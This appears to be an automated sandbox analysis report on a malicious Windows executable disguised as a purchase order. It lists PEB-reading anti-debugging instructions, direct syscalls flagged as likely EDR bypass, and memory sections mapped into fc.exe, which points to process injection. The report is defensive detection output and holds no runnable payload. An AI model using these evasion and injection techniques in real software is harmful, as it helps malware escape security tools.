              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F9A9D0 mov eax, dword ptr fs:[00000030h]0_2_00F9A9D0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F9A9D0 mov eax, dword ptr fs:[00000030h]0_2_00F9A9D0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FC49D0 mov eax, dword ptr fs:[00000030h]0_2_00FC49D0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0103483A mov eax, dword ptr fs:[00000030h]0_2_0103483A
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0103483A mov eax, dword ptr fs:[00000030h]0_2_0103483A
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F909AD mov eax, dword ptr fs:[00000030h]0_2_00F909AD
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F909AD mov eax, dword ptr fs:[00000030h]0_2_00F909AD
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FA29A0 mov eax, dword ptr fs:[00000030h]0_2_00FA29A0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FA29A0 mov eax, dword ptr fs:[00000030h]0_2_00FA29A0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FA29A0 mov eax, dword ptr fs:[00000030h]0_2_00FA29A0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FA29A0 mov eax, dword ptr fs:[00000030h]0_2_00FA29A0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FA29A0 mov eax, dword ptr fs:[00000030h]0_2_00FA29A0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FA29A0 mov eax, dword ptr fs:[00000030h]0_2_00FA29A0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FA29A0 mov eax, dword ptr fs:[00000030h]0_2_00FA29A0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FA29A0 mov eax, dword ptr fs:[00000030h]0_2_00FA29A0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FA29A0 mov eax, dword ptr fs:[00000030h]0_2_00FA29A0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FA29A0 mov eax, dword ptr fs:[00000030h]0_2_00FA29A0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FA29A0 mov eax, dword ptr fs:[00000030h]0_2_00FA29A0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FA29A0 mov eax, dword ptr fs:[00000030h]0_2_00FA29A0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FA29A0 mov eax, dword ptr fs:[00000030h]0_2_00FA29A0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01026870 mov eax, dword ptr fs:[00000030h]0_2_01026870
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01026870 mov eax, dword ptr fs:[00000030h]0_2_01026870
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0101E872 mov eax, dword ptr fs:[00000030h]0_2_0101E872
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0101E872 mov eax, dword ptr fs:[00000030h]0_2_0101E872
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FD096E mov eax, dword ptr fs:[00000030h]0_2_00FD096E
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FD096E mov edx, dword ptr fs:[00000030h]0_2_00FD096E
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FD096E mov eax, dword ptr fs:[00000030h]0_2_00FD096E
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FB6962 mov eax, dword ptr fs:[00000030h]0_2_00FB6962
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FB6962 mov eax, dword ptr fs:[00000030h]0_2_00FB6962
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FB6962 mov eax, dword ptr fs:[00000030h]0_2_00FB6962
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0101C89D mov eax, dword ptr fs:[00000030h]0_2_0101C89D
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F88918 mov eax, dword ptr fs:[00000030h]0_2_00F88918
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F88918 mov eax, dword ptr fs:[00000030h]0_2_00F88918
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0105A8E4 mov eax, dword ptr fs:[00000030h]0_2_0105A8E4
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FCAAEE mov eax, dword ptr fs:[00000030h]0_2_00FCAAEE
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FCAAEE mov eax, dword ptr fs:[00000030h]0_2_00FCAAEE
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0100EB1D mov eax, dword ptr fs:[00000030h]0_2_0100EB1D
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0100EB1D mov eax, dword ptr fs:[00000030h]0_2_0100EB1D
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0100EB1D mov eax, dword ptr fs:[00000030h]0_2_0100EB1D
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0100EB1D mov eax, dword ptr fs:[00000030h]0_2_0100EB1D
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0100EB1D mov eax, dword ptr fs:[00000030h]0_2_0100EB1D
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0100EB1D mov eax, dword ptr fs:[00000030h]0_2_0100EB1D
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0100EB1D mov eax, dword ptr fs:[00000030h]0_2_0100EB1D
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0100EB1D mov eax, dword ptr fs:[00000030h]0_2_0100EB1D
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0100EB1D mov eax, dword ptr fs:[00000030h]0_2_0100EB1D
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F90AD0 mov eax, dword ptr fs:[00000030h]0_2_00F90AD0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FC4AD0 mov eax, dword ptr fs:[00000030h]0_2_00FC4AD0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FC4AD0 mov eax, dword ptr fs:[00000030h]0_2_00FC4AD0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01058B28 mov eax, dword ptr fs:[00000030h]0_2_01058B28
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01058B28 mov eax, dword ptr fs:[00000030h]0_2_01058B28
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FE6ACC mov eax, dword ptr fs:[00000030h]0_2_00FE6ACC
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FE6ACC mov eax, dword ptr fs:[00000030h]0_2_00FE6ACC
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FE6ACC mov eax, dword ptr fs:[00000030h]0_2_00FE6ACC
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01038B42 mov eax, dword ptr fs:[00000030h]0_2_01038B42
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01026B40 mov eax, dword ptr fs:[00000030h]0_2_01026B40
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01026B40 mov eax, dword ptr fs:[00000030h]0_2_01026B40
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0105AB40 mov eax, dword ptr fs:[00000030h]0_2_0105AB40
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01044B4B mov eax, dword ptr fs:[00000030h]0_2_01044B4B
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01044B4B mov eax, dword ptr fs:[00000030h]0_2_01044B4B
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0103EB50 mov eax, dword ptr fs:[00000030h]0_2_0103EB50
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F98AA0 mov eax, dword ptr fs:[00000030h]0_2_00F98AA0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F98AA0 mov eax, dword ptr fs:[00000030h]0_2_00F98AA0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FE6AA4 mov eax, dword ptr fs:[00000030h]0_2_00FE6AA4
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FC8A90 mov edx, dword ptr fs:[00000030h]0_2_00FC8A90
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F9EA80 mov eax, dword ptr fs:[00000030h]0_2_00F9EA80
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F9EA80 mov eax, dword ptr fs:[00000030h]0_2_00F9EA80
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F9EA80 mov eax, dword ptr fs:[00000030h]0_2_00F9EA80
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F9EA80 mov eax, dword ptr fs:[00000030h]0_2_00F9EA80
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F9EA80 mov eax, dword ptr fs:[00000030h]0_2_00F9EA80
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F9EA80 mov eax, dword ptr fs:[00000030h]0_2_00F9EA80
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F9EA80 mov eax, dword ptr fs:[00000030h]0_2_00F9EA80
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F9EA80 mov eax, dword ptr fs:[00000030h]0_2_00F9EA80
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F9EA80 mov eax, dword ptr fs:[00000030h]0_2_00F9EA80
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FCCA6F mov eax, dword ptr fs:[00000030h]0_2_00FCCA6F
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FCCA6F mov eax, dword ptr fs:[00000030h]0_2_00FCCA6F
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FCCA6F mov eax, dword ptr fs:[00000030h]0_2_00FCCA6F
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FA0A5B mov eax, dword ptr fs:[00000030h]0_2_00FA0A5B
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FA0A5B mov eax, dword ptr fs:[00000030h]0_2_00FA0A5B
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F96A50 mov eax, dword ptr fs:[00000030h]0_2_00F96A50
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F96A50 mov eax, dword ptr fs:[00000030h]0_2_00F96A50
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F96A50 mov eax, dword ptr fs:[00000030h]0_2_00F96A50
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F96A50 mov eax, dword ptr fs:[00000030h]0_2_00F96A50
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F96A50 mov eax, dword ptr fs:[00000030h]0_2_00F96A50
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F96A50 mov eax, dword ptr fs:[00000030h]0_2_00F96A50
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F96A50 mov eax, dword ptr fs:[00000030h]0_2_00F96A50
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01044BB0 mov eax, dword ptr fs:[00000030h]0_2_01044BB0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01044BB0 mov eax, dword ptr fs:[00000030h]0_2_01044BB0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FCCA38 mov eax, dword ptr fs:[00000030h]0_2_00FCCA38
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FB4A35 mov eax, dword ptr fs:[00000030h]0_2_00FB4A35
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FB4A35 mov eax, dword ptr fs:[00000030h]0_2_00FB4A35
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0103EBD0 mov eax, dword ptr fs:[00000030h]0_2_0103EBD0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FBEA2E mov eax, dword ptr fs:[00000030h]0_2_00FBEA2E
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FCCA24 mov eax, dword ptr fs:[00000030h]0_2_00FCCA24
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0101CBF0 mov eax, dword ptr fs:[00000030h]0_2_0101CBF0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FBEBFC mov eax, dword ptr fs:[00000030h]0_2_00FBEBFC
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F98BF0 mov eax, dword ptr fs:[00000030h]0_2_00F98BF0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F98BF0 mov eax, dword ptr fs:[00000030h]0_2_00F98BF0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F98BF0 mov eax, dword ptr fs:[00000030h]0_2_00F98BF0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0101CA11 mov eax, dword ptr fs:[00000030h]0_2_0101CA11
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FB0BCB mov eax, dword ptr fs:[00000030h]0_2_00FB0BCB
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FB0BCB mov eax, dword ptr fs:[00000030h]0_2_00FB0BCB
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FB0BCB mov eax, dword ptr fs:[00000030h]0_2_00FB0BCB
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F90BCD mov eax, dword ptr fs:[00000030h]0_2_00F90BCD
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F90BCD mov eax, dword ptr fs:[00000030h]0_2_00F90BCD
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F90BCD mov eax, dword ptr fs:[00000030h]0_2_00F90BCD
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FA0BBE mov eax, dword ptr fs:[00000030h]0_2_00FA0BBE
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FA0BBE mov eax, dword ptr fs:[00000030h]0_2_00FA0BBE
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0103EA60 mov eax, dword ptr fs:[00000030h]0_2_0103EA60
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0100CA72 mov eax, dword ptr fs:[00000030h]0_2_0100CA72
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0100CA72 mov eax, dword ptr fs:[00000030h]0_2_0100CA72
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F8CB7E mov eax, dword ptr fs:[00000030h]0_2_00F8CB7E
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01064A80 mov eax, dword ptr fs:[00000030h]0_2_01064A80
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FBEB20 mov eax, dword ptr fs:[00000030h]0_2_00FBEB20
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FBEB20 mov eax, dword ptr fs:[00000030h]0_2_00FBEB20
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FC2CF0 mov eax, dword ptr fs:[00000030h]0_2_00FC2CF0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FC2CF0 mov eax, dword ptr fs:[00000030h]0_2_00FC2CF0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FC2CF0 mov eax, dword ptr fs:[00000030h]0_2_00FC2CF0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FC2CF0 mov eax, dword ptr fs:[00000030h]0_2_00FC2CF0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01048D10 mov eax, dword ptr fs:[00000030h]0_2_01048D10
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01048D10 mov eax, dword ptr fs:[00000030h]0_2_01048D10
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01018D20 mov eax, dword ptr fs:[00000030h]0_2_01018D20

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Found direct / indirect Syscall (likely to bypass EDR)
              Source: C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exeNtAllocateVirtualMemory: Direct from: 0x76EF48ECJump to behavior
              Source: C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exeNtQueryAttributesFile: Direct from: 0x76EF2E6CJump to behavior
              Source: C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exeNtQueryVolumeInformationFile: Direct from: 0x76EF2F2CJump to behavior
              Source: C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exeNtQuerySystemInformation: Direct from: 0x76EF48CCJump to behavior
              Source: C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exeNtOpenSection: Direct from: 0x76EF2E0CJump to behavior
              Source: C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exeNtDeviceIoControlFile: Direct from: 0x76EF2AECJump to behavior
              Source: C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BECJump to behavior
              Source: C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exeNtQueryInformationToken: Direct from: 0x76EF2CACJump to behavior
              Source: C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exeNtCreateFile: Direct from: 0x76EF2FECJump to behavior
              Source: C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exeNtOpenFile: Direct from: 0x76EF2DCCJump to behavior
              Source: C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exeNtTerminateThread: Direct from: 0x76EF2FCCJump to behavior
              Source: C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exeNtOpenKeyEx: Direct from: 0x76EF2B9CJump to behavior
              Source: C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exeNtSetInformationProcess: Direct from: 0x76EF2C5CJump to behavior
              Source: C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exeNtProtectVirtualMemory: Direct from: 0x76EF2F9CJump to behavior
              Source: C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exeNtWriteVirtualMemory: Direct from: 0x76EF2E3CJump to behavior
              Source: C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exeNtNotifyChangeKey: Direct from: 0x76EF3C2CJump to behavior
              Source: C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exeNtCreateMutant: Direct from: 0x76EF35CCJump to behavior
              Source: C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exeNtResumeThread: Direct from: 0x76EF36ACJump to behavior
              Source: C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exeNtMapViewOfSection: Direct from: 0x76EF2D1CJump to behavior
              Source: C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exeNtProtectVirtualMemory: Direct from: 0x76EE7B2EJump to behavior
              Source: C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BFCJump to behavior
              Source: C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exeNtQuerySystemInformation: Direct from: 0x76EF2DFCJump to behavior
              Source: C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exeNtReadFile: Direct from: 0x76EF2ADCJump to behavior
              Source: C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exeNtDelayExecution: Direct from: 0x76EF2DDCJump to behavior
              Source: C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exeNtQueryInformationProcess: Direct from: 0x76EF2C26Jump to behavior
              Source: C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exeNtResumeThread: Direct from: 0x76EF2FBCJump to behavior
              Source: C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exeNtCreateUserProcess: Direct from: 0x76EF371CJump to behavior
              Source: C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exeNtAllocateVirtualMemory: Direct from: 0x76EF3C9CJump to behavior
              Source: C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exeNtSetInformationThread: Direct from: 0x76EE63F9Jump to behavior
              Source: C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exeNtWriteVirtualMemory: Direct from: 0x76EF490CJump to behavior
              Source: C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exeNtClose: Direct from: 0x76EF2B6C
              Source: C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exeNtSetInformationThread: Direct from: 0x76EF2B4CJump to behavior
              Source: C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exeNtCreateKey: Direct from: 0x76EF2C6CJump to behavior
              Source: C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exeNtReadVirtualMemory: Direct from: 0x76EF2E8CJump to behavior
              Maps a DLL or memory area into another process
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeSection loaded: NULL target: C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exe protection: execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeSection loaded: NULL target: C:\Windows\SysWOW64\fc.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: NULL target: C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exe protection: read writeJump to behavior
